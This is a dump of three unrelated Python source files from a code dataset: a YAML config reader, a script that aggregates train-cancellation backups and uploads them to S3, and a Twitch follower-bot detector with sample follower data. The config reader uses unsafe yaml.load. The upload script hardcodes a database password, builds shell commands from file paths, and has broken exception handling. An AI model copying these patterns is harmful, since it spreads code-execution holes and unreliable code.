] | null | null | null | adapo/config.py | michaelimfeld/adapo | 06cd883b0f46924f20b7fc48260c0d0cd471d6c9 | [
"MIT"
] | null | null | null | """
Provides a YAML configuration file reader.
"""
import yaml
from adapo.logger import Logger
class Config(object):
"""
YAML configuration file reader.
"""
def __init__(self, path):
self._cfg = None
self._log = Logger()
self._path = path
self.load_config()
def load_config(self):
"""
Loads config file.
"""
config_file = open(self._path, "r")
self._cfg = yaml.load(config_file)
config_file.close()
self._log.info("config file '%s' loaded" % self._path)
def __getattr__(self, attr):
"""
Returns configuration value by attribute.
"""
value = self._cfg.get(attr)
if not value:
self._log.warn(
"could not find value for key '{0}' in '{1}'"
.format(attr, self._path)
)
return value
| 22.9 | 62 | 0.530568 |
187bfd89bf56db61520e6e4074a511eeae1d369c | 9,279 | py | Python | zugdaten/upload_db_use_for_api.py | cfleschhut/virushack | 2fe7ded0be8672b066edef7fed52573794db2ba5 | [
"Apache-2.0"
] | null | null | null | zugdaten/upload_db_use_for_api.py | cfleschhut/virushack | 2fe7ded0be8672b066edef7fed52573794db2ba5 | [
"Apache-2.0"
] | null | null | null | zugdaten/upload_db_use_for_api.py | cfleschhut/virushack | 2fe7ded0be8672b066edef7fed52573794db2ba5 | [
"Apache-2.0"
] | null | null | null | """ Importiert die Backups aus dem Speicher und
uploaded tageweise in amazon s3 """
import os
import re
import pandas as pd
from datetime import datetime
# compatibility with ipython
try:
__IPYTHON__
os.chdir(os.path.dirname(__file__))
except: pass
from db import DatabaseWrapper
import json
import boto3
from pathlib import Path
import geopandas.tools
from shapely.geometry import Point
import pymysql
# download shapefiles
countries = geopandas.GeoDataFrame.from_file(
"https://raw.githubusercontent.com/AliceWi/TopoJSON-Germany/master/germany.json",
layer=1,
driver="TopoJSON")
# clean unnecessary columns
countries = countries[["id", "name", "geometry"]]
countries.columns = ["landkreise_id", "landkreis", "geometry"]
db = DatabaseWrapper("localhost", "hafasdb2", "hafas", "123")
connection_aws = pymysql.connect(
host=config["host"],
user=config["user"],
password=config["password"],
db=config["database"],
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
connection_local = pymysql.connect(
host="localhost",
user="hafas",
password="123",
db="hafasdb2",
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
conf = json.load(open("sdd-db.conf", "r"))
# ask Parzival for permissions
db_aws = DatabaseWrapper(
database=conf["database"],
host=conf["host"],
user=conf["user"],
password=conf["password"]
)
path = "/home/bemootzer/Documents/SoftwareProjekte/stewardless/stewardless-crawler/dbbackup"
#path = "/media/bemootzer/SICHERUNG/stewardless/data"
re_sql = re.compile(r"arrival.*.sql")
#_, blacklist, _ = next(os.walk(os.path.join("summaries","data")))
_, blacklist, _ = next(os.walk(path))
blacklist.append("2020-02-01") # data not complete
for file in os.listdir(path):
if re_sql.match(file):
# LOAD BACKUP
#file = "arrivals-2020-03-01.sql"
date_string = file.replace("arrivals-", "").replace(".sql", "")
if date_string in blacklist:
print("skip %s" % file)
continue #skip because this file was already uploaded.
try:
print("current file", file)
os.system("mysql -u hafas -e 'CREATE DATABASE IF NOT EXISTS hafasdb2'")
os.system("mysql -u hafas -e 'DROP TABLE IF EXISTS hafasdb2.arrivals'")
os.system("mysql -u hafas --force hafasdb2 < %s" % os.path.join(path, file))
# RUN QUERY ON BACKUP FOR SCHEDULED STOPS
q = """
SELECT
T1.stopId,
T2.longitude,
T2.latitude,
lineProduct,
YEAR(scheduledWhen),
MONTH(scheduledWhen),
DAY(scheduledWhen),
HOUR(scheduledWhen), COUNT(*)
FROM arrivals AS T1
JOIN hafasdb.stations AS T2 ON T1.stopId = T2.id
WHERE lineProduct IN ("bus", "suburban", "regional", "nationalExpress", "national")
GROUP BY stopID, lineProduct, YEAR(scheduledWhen), MONTH(scheduledWhen), DAY(scheduledWhen), HOUR(scheduledWhen)
"""
df = pd.read_sql(q, connection_local)
df.columns = ["stopId", "lon", "lat", "lineProduct", "year", "month", "day", "hour", "planned_stops"]
def setDate(series):
return datetime(series["year"], series["month"], series["day"], series["hour"], )
df["date"] = df.apply(setDate, axis=1)
df.drop(["year", "month", "day", "hour"], axis=1, inplace=True)
df = df.dropna(subset=['lon', 'lat'])
# RUN QUERY ON BACKUP FOR CANCELLED STOPS
q = """
SELECT
T1.stopId,
T2.longitude,
T2.latitude,
lineProduct,
YEAR(scheduledWhen),
MONTH(scheduledWhen),
DAY(scheduledWhen),
HOUR(scheduledWhen),
COUNT(*)
FROM arrivals AS T1
JOIN hafasdb.stations AS T2 ON T1.stopId = T2.id
WHERE lineProduct IN ("bus", "suburban", "regional", "nationalExpress", "national")
AND cancelled = 1
GROUP BY stopID, lineProduct, YEAR(scheduledWhen), MONTH(scheduledWhen), DAY(scheduledWhen), HOUR(scheduledWhen)
"""
df_cancelled = pd.read_sql(q, connection_local)
df_cancelled.columns = ["stopId", "lon", "lat", "lineProduct", "year", "month", "day", "hour", "cancelled_stops"]
df_cancelled["date"] = df_cancelled.apply(setDate, axis=1)
df_cancelled.drop(["year", "month", "day", "hour"], axis=1, inplace=True)
df_cancelled = df_cancelled.dropna(subset=['lon', 'lat'])
# DO SOPHISTICATED MERGE WITH CUSTOM INDEX
def customIndex(series):
return str(series["stopId"]) + series["lineProduct"] + str(series["date"])
df["customIndex"] = df.apply(customIndex, axis=1)
df_cancelled["customIndex"] = df_cancelled.apply(customIndex, axis=1)
df = df.merge(
df_cancelled[["customIndex", "cancelled_stops"]],
on="customIndex",
how="left",
suffixes=(False, False))
# REPLACE NULL VALUES IN CANCELLED STOPS WITH 0
df.cancelled_stops.fillna(0, inplace=True)
# REMOVE CUSTOM INDEX
df.drop("customIndex", axis=1, inplace=True)
# WRITE A SHORT DAILY SUMMARY TO DISC
summary_path = os.path.join(os.getcwd(), "summaries", "data", date_string)
Path(summary_path).mkdir(parents=True, exist_ok=True)
tmp = json.loads(df.groupby(["lineProduct"]).sum()[["planned_stops", "cancelled_stops"]].to_json())
summary = {
"date": date_string,
"planned_stops": tmp["planned_stops"],
"cancelled_stops": tmp["cancelled_stops"]
}
# preprocess data
def coord_to_point(x):
return Point(x["lon"], x["lat"])
df["geometry"] = df[["lon", "lat"]].apply(coord_to_point, axis=1)
df = geopandas.GeoDataFrame(df, geometry="geometry")
df = geopandas.sjoin(df, countries, how="left", op='intersects')
df.drop(["index_right", "geometry"], axis=1, inplace=True)
df.dropna(inplace=True) # remove those that couldnt be matched to shapes
# aggregate by region
unique_regions = df["landkreise_id"].unique()
unique_datetimes = df["date"].unique()
unique_lineProducts = ['nationalExpress', 'regional', 'suburban', 'national', 'bus']
cnt = 0
result = []
for r in unique_regions:
cnt = cnt + 1
print("%2.4f" % (cnt / len(unique_regions)))
for d in unique_datetimes:
# for p in unique_lineProducts:
# cnt =+ 1
# if cnt % 100 == 0: print("%2,2f" % (cnt / (len(unique_datetimes)*len(unique_lineProducts)*len(unique_regions))))
# # filter accordingly
# df_filtered = df[(df.name==r) & (df.date == d) & (df.lineProduct == p)]
# score_reference = df_filtered.planned_stops.mean()
# score_absolute = df_filtered.cancelled_stops.mean()
# score_value = score_reference / score_absolute
# if len(df_filtered) > 0:
# result.append({
# "region": r,
# "lon": df_filtered.lon.iloc[0],
# "lat": df_filtered.lat.iloc[0],
# "date": d,
# "absolute_value": score_absolute,
# "reference_value": score_reference,
# "score_value": score_value,
# "name": unique_lineProducts
# })
# for all trains
df_filtered = df[(df.name==r) & (df.date == d)]
score_reference = df_filtered.planned_stops.sum()
score_absolute = df_filtered.cancelled_stops.sum()
score_value = score_reference / score_absolute
if len(df_filtered) > 0:
result.append({
"region": r,
"lon": df_filtered.lon.iloc[0],
"lat": df_filtered.lat.iloc[0],
"date": d,
"absolute_value": score_absolute,
"reference_value": score_reference,
"score_value": score_value,
"name": "all",
"cnt": len(df_filtered)
})
df_db = pd.DataFrame(result, columns=["region", "lon", "lat", "date", "absolute_value", "reference_value", "score_value", "name", "cnt"])
q = """
INSERT INTO scores (ags) VALUES (%s)
"""
data = [("01234345", )]
db_aws.execute_many(q, data )
print(len(df_db))
with open(os.path.join(summary_path, date_string + ".json"), "w+") as f:
json.dump(summary, f, indent=2)
break
except:
pass
# UPLOAD JSON TO AMAZON
j = json.loads(df.to_json(orient="records"))
client_s3 = boto3.client("s3"#region_name="eu-central-1"
)
response = client_s3.put_object(
Bucket="sdd-s3-basebucket",
Body=json.dumps(j),
Key="zugdaten/" + "/".join(date_string.split("-")) + "/zugdaten.json"
)
print("upload successfull", file)
# for small uploads
# client = boto3.client("firehose")
# response = client.put_record(
# DeliveryStreamName='zugdaten',
# Record={
# 'Data': json.dumps(j[0])
# })
except Exception as ex:
print(ex)
print("%s was not processed properly" % file)
else:
print("False")
| 34.752809 | 143 | 0.598879 |
d95f95a1eede807bb4243a355e85152a2c6589d6 | 45,996 | py | Python | src/bot_detection.py | data-day-life/twitch_rec | 614071fe474d589fe610a5fd62eb8ba9fa509143 | [
"MIT"
] | null | null | null | src/bot_detection.py | data-day-life/twitch_rec | 614071fe474d589fe610a5fd62eb8ba9fa509143 | [
"MIT"
] | null | null | null | src/bot_detection.py | data-day-life/twitch_rec | 614071fe474d589fe610a5fd62eb8ba9fa509143 | [
"MIT"
] | null | null | null | from dateutil.parser import parse as dt_parse
class BotDetector:
def __init__(self):
self.total_removed = 0
def __str__(self):
return f'Removed {self.total_removed} potential follower bots total.'
@staticmethod
def parse_times(foll_list):
"""
Utilizes python's dateutil parser to convert follow times to datetime objects for comparison.
Args:
foll_list (list):
A list of dictionaries in follower_reply['data'] from Twitch with format:
[{'from_id': '123', 'from_name': 'xyz', 'to_id': '456', 'to_name': 'abc',
'followed_at': '2020-06-28T04:57:07Z'}, ...]
Returns:
A list of datetime objects that can be used to compare the difference in follow times between a sequence of
followers.
"""
return [dt_parse(follower.get('followed_at', None)) for follower in foll_list]
def detect_follower_bot_uids(self, foll_list: list, print_status: bool = False) -> set:
"""
When given a follower list, this function flags uids that may be bots. Bots are detected by computing the time
difference between a sequence of two followers. Users are flagged as 'bots' when they follow a streamer_uid in
rapid succession.
Args:
foll_list (list):
A list of dictionaries in follower_reply['data'] from Twitch with format:
[{'from_id': '123', 'from_name': 'xyz', 'to_id': '456', 'to_name': 'abc',
'followed_at': '2020-06-28T04:57:07Z'}, ...]
print_status (bool):
Prints summary output of detected bots.
Returns:
A set of flagged user id's as ('1234', '4567', ...)
"""
flagged_bot_uids = set()
flagged_idxs = list()
# Parse all times with datetime
parsed_list = self.parse_times(foll_list)
one_sec = 1
if len(parsed_list) > 1:
# Compare all but last two
for idx in range(len(parsed_list)-1):
if (parsed_list[idx] - parsed_list[idx+1]).total_seconds() <= one_sec:
flagged_bot_uids.add(foll_list[idx].get('from_id', None))
flagged_idxs.append(idx)
# Compare final two and add last item if necessary
if (parsed_list[-2] - parsed_list[-1]).total_seconds() <= one_sec:
flagged_bot_uids.add(foll_list[-1].get('from_id', None))
flagged_idxs.append(len(parsed_list)-1)
if print_status:
print(f'Detected {len(flagged_bot_uids)} follower bot(s) in follower list.')
print(f'Flagged (idx, uid): {[flagged for flagged in zip(flagged_idxs, flagged_bot_uids)]}')
return flagged_bot_uids
def remove_foll_bot_uids(self, foll_list: list, flagged_bot_uids: set = None) -> list:
"""
Removes flagged bot uids from a follower list but retains the initial format of the follower list.
Args:
foll_list (list):
A list of dictionaries in follower_reply['data'] from Twitch with format:
[{'from_id': '123', 'from_name': 'xyz', 'to_id': '456', 'to_name': 'abc',
'followed_at': '2020-06-28T04:57:07Z'}, ...]
flagged_bot_uids (set):
A set of flagged uids that are most likely bots. If no set is provided then it will be produced by
calling detect_follower_bot_uids()
Returns:
A sanitized follower list in the original foll_list format.
"""
if not flagged_bot_uids:
flagged_bot_uids = self.detect_follower_bot_uids(foll_list)
self.total_removed += len(flagged_bot_uids)
return [follower for follower in foll_list if follower.get('from_id') not in flagged_bot_uids]
def sanitize_foll_list(self, foll_list: list) -> list:
"""
Performs detection and removal of follower bots and returns a sanitized list of uids.
Args:
foll_list (list):
A list of dictionaries in follower_reply['data'] from Twitch with format:
[{'from_id': '123', 'from_name': 'xyz', 'to_id': '456', 'to_name': 'abc',
'followed_at': '2020-06-28T04:57:07Z'}, ...]
Returns:
A list of sanitized follower id's as ['1234', '456', ...]
"""
flagged_bot_uids = self.detect_follower_bot_uids(foll_list)
sanitized_uids = self.remove_foll_bot_uids(foll_list, flagged_bot_uids)
return [follower.get('from_id', None) for follower in sanitized_uids]
def main():
bot_det = BotDetector()
sample_foll_list = [{'from_id': '74812972', 'from_name': 'Oiee', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-28T04:57:07Z'}, {'from_id': '186648072', 'from_name': 'MajorCamper12', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-27T05:35:34Z'}, {'from_id': '541844169', 'from_name': 'danielis52525', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-27T03:55:38Z'}, {'from_id': '227452570', 'from_name': 'slam6000', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-26T03:43:30Z'}, {'from_id': '546467589', 'from_name': 'farhadgames', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-22T00:49:56Z'}, {'from_id': '506674369', 'from_name': 'rxseanon', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-21T04:53:24Z'}, {'from_id': '540171341', 'from_name': 'bronson223', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-20T06:59:41Z'}, {'from_id': '134639096', 'from_name': 'RollingFlowers', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-20T05:58:09Z'}, {'from_id': '536605822', 'from_name': 'spicyftw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-01T06:13:11Z'}, {'from_id': '189336802', 'from_name': 'Mrdragon9968', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-06-01T04:10:33Z'}, {'from_id': '514062872', 'from_name': 'n00b_head', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-30T05:03:37Z'}, {'from_id': '99915227', 'from_name': 'Nosle3pn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-29T17:18:02Z'}, {'from_id': '233951670', 'from_name': 'PercyGrunwald', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-29T17:15:27Z'}, {'from_id': '452466999', 'from_name': 'xprestige', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-23T04:34:26Z'}, {'from_id': '531065971', 'from_name': 'pokemon_loverz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-23T03:54:27Z'}, {'from_id': '501675989', 'from_name': 'scruffy_armadillo_daking', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-23T03:40:31Z'}, {'from_id': '450004898', 'from_name': 'brosephballin9', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-13T04:07:47Z'}, {'from_id': '529146961', 'from_name': 'tefurcule1989', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-11T17:03:11Z'}, {'from_id': '528272096', 'from_name': 'kaymen_cyder', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-11T06:17:08Z'}, {'from_id': '528596967', 'from_name': 'ertisinkey1977', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-10T13:21:57Z'}, {'from_id': '223057951', 'from_name': 'wild0ttv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-07T21:32:12Z'}, {'from_id': '527110911', 'from_name': 'eganenpros1976', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-07T18:23:10Z'}, {'from_id': '122386377', 'from_name': 'aspie8675', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-05T21:29:40Z'}, {'from_id': '279742959', 'from_name': 'UhhApple', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-05-02T08:11:31Z'}, {'from_id': '521051913', 'from_name': 'dfxsfather', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-30T06:48:34Z'}, {'from_id': '466107921', 'from_name': 'lietuviss', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-28T09:02:19Z'}, {'from_id': '460500001', 'from_name': 'achimedes', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-27T22:06:10Z'}, {'from_id': '501880128', 'from_name': 'kelooks', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-27T09:01:19Z'}, {'from_id': '177726472', 'from_name': 'Footbucket', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-27T03:25:32Z'}, {'from_id': '520578689', 'from_name': 'lxyboi', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-26T00:14:39Z'}, {'from_id': '485843821', 'from_name': 'king32175', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-22T05:27:59Z'}, {'from_id': '238199105', 'from_name': 'kaeden456', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-22T04:35:00Z'}, {'from_id': '516742317', 'from_name': 'warzonewarrior17', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-21T05:16:58Z'}, {'from_id': '516953407', 'from_name': 'hamburgerking12', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-21T05:16:40Z'}, {'from_id': '516842027', 'from_name': 'dxrk_clappy', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-20T05:23:44Z'}, {'from_id': '416604658', 'from_name': 'vogulemagazine', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-20T02:51:00Z'}, {'from_id': '516377788', 'from_name': 'ringwisbackti1972', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-18T12:03:52Z'}, {'from_id': '516283808', 'from_name': 'shino_zap', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-18T06:45:38Z'}, {'from_id': '515678307', 'from_name': 'renorcali1988', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-17T13:06:45Z'}, {'from_id': '515678198', 'from_name': 'dandpameka1973', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-17T12:09:34Z'}, {'from_id': '503984671', 'from_name': 'yizzysszn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-17T06:09:33Z'}, {'from_id': '514729005', 'from_name': 'ceypsorarac1984', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-15T19:09:43Z'}, {'from_id': '514295793', 'from_name': 'hargtranlubo1971', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-15T01:06:48Z'}, {'from_id': '226425431', 'from_name': 'Vulknan', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T05:23:48Z'}, {'from_id': '248417306', 'from_name': 'reelraiders0q', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244480120', 'from_name': 'witwixch', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248290726', 'from_name': 'kunshikittyq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486320509', 'from_name': 'Arrestpartzdrot', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248403304', 'from_name': 'kragieed', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248329834', 'from_name': 'ggriagq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485509966', 'from_name': 'spyswr', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485618594', 'from_name': 'rhythmnnm', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244408792', 'from_name': 'djulestvl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '479440626', 'from_name': 'permissiblefish17', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248322133', 'from_name': 'pocketstreamc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '479450485', 'from_name': 'pondFloralaod', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '479449146', 'from_name': 'gladeAutumnVCR', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248403496', 'from_name': 'girl2clutchh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248399070', 'from_name': 'kortneyplayso', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244390413', 'from_name': 'ezequielrogel7', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '479443835', 'from_name': 'cherryfxz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248363156', 'from_name': 'itsliaaac', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248291915', 'from_name': 'dossierchannel0', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485626851', 'from_name': 'harmonyp0W', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492157447', 'from_name': 'nutProduce', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492162196', 'from_name': 'GrassvXc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248364026', 'from_name': 'magalzaoshowvm', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492151786', 'from_name': 'knowledgepjl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485530780', 'from_name': 'cherryeos', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492135548', 'from_name': 'fogFallingamg', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486323547', 'from_name': 'Respectindustrious', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244479813', 'from_name': 'xduracelv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492168807', 'from_name': 'frypailimm', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248388656', 'from_name': 'dota2ti_5i', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244496965', 'from_name': 'idropz_bodies6', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244390517', 'from_name': 'talon2461u', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244412294', 'from_name': 'shortyyguyt', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248328431', 'from_name': 'daddy_law_694', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486328998', 'from_name': 'maskfuturistic', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486318753', 'from_name': 'snowlisa98', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248373549', 'from_name': 'kep_vorobei5', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244415158', 'from_name': 'loryfl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244428037', 'from_name': 'lakexl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248362291', 'from_name': 'delkonixv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244375144', 'from_name': 'mouzakrobat7', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244412341', 'from_name': 'sorabi_u', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486327174', 'from_name': 'discoveryaqE', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248404944', 'from_name': 'fuzzface496', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486315094', 'from_name': 'breadvjd', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485566907', 'from_name': 'silvernar', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '479449228', 'from_name': 'Borderbbs', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492128950', 'from_name': 'shapecuo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248397504', 'from_name': 'qksnipermh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492139643', 'from_name': 'drivingexn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492168064', 'from_name': 'earvcn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492171359', 'from_name': 'Dustpolished199', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486318031', 'from_name': 'Burstpfu', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492148038', 'from_name': 'Sleepygroup77', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244412390', 'from_name': 'vorhalaj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '243804052', 'from_name': 'mikailstreamp', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244467010', 'from_name': 'giggand4', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492126126', 'from_name': 'wisheux', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244405431', 'from_name': 'wtfgamenationo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248340992', 'from_name': 'twozerothreetvp', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485518673', 'from_name': 'statementzzW', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244389239', 'from_name': 'linkdeadx24', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248401782', 'from_name': 'rorichannik', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486323007', 'from_name': 'Lisanwf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '485532403', 'from_name': 'schoolMWP', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492107378', 'from_name': 'CoastTravel', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248376273', 'from_name': 'thepandorahousef', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '492152791', 'from_name': 'partGrandfather208', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248364043', 'from_name': 'frankkasterq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248399004', 'from_name': 'dernicoqs', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '244427961', 'from_name': 'blackfireiced', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '486323197', 'from_name': 'absorbfightjt0', 'to_id': '106071345', 